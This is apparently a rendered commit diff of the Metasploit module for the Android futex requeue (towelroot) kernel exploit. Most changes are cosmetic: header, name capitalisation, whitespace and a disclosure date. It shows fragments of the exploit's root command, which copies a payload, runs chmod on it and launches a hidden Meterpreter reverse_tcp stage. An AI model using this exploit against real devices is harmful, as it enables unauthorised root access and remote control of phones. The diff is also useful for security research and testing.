1
1
##
2
- # This file is part of the Metasploit Framework and may be subject to
3
- # redistribution and commercial restrictions. Please see the Metasploit
4
- # web site for more information on licensing and terms of use.
5
- # http://metasploit.com/
2
+ # This module requires Metasploit: http://metasploit.com/download
3
+ # Current source: https://github.com/rapid7/metasploit-framework
6
4
##
7
5
8
6
require 'msf/core'
@@ -16,14 +14,14 @@ class Metasploit4 < Msf::Exploit::Local
16
14
17
15
def initialize ( info = { } )
18
16
super ( update_info ( info , {
19
- 'Name' => 'Android futex requeue kernel exploit ' ,
17
+ 'Name' => 'Android Futex Requeue Kernel Exploit ' ,
20
18
'Description' => %q{
21
19
This module exploits a bug in futex_requeue in the linux kernel.
22
- Any android phone with a kernel built before June 2014 should be vulnerable.
20
+ Any android phone with a kernel built before June 2014 should be vulnerable.
23
21
} ,
24
22
'License' => MSF_LICENSE ,
25
23
'Author' => [
26
- 'Pinkie Pie' , #discovery
24
+ 'Pinkie Pie' , #discovery
27
25
'geohot' , #towelroot
28
26
'timwr' #metasploit module
29
27
] ,
@@ -41,7 +39,8 @@ def initialize(info={})
41
39
{
42
40
'PAYLOAD' => 'android/meterpreter/reverse_tcp' ,
43
41
} ,
44
- 'DefaultTarget' => 0
42
+ 'DefaultTarget' => 0 ,
43
+ 'DisclosureDate' => "May 03 2014"
45
44
}
46
45
) )
47
46
@@ -74,7 +73,7 @@ def exploit
74
73
rootcmd += "cp " + payloadfile + " #{ rootpayload } && "
75
74
rootcmd += "chmod 766 #{ rootpayload } && "
76
75
rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{ rootpayload } com.metasploit.stage.Payload"
77
-
76
+
78
77
process = session . sys . process . execute ( exploitfile , rootcmd , { 'Hidden' => true , 'Channelized' => true } )
79
78
process . channel . read
80
79
end
0 commit comments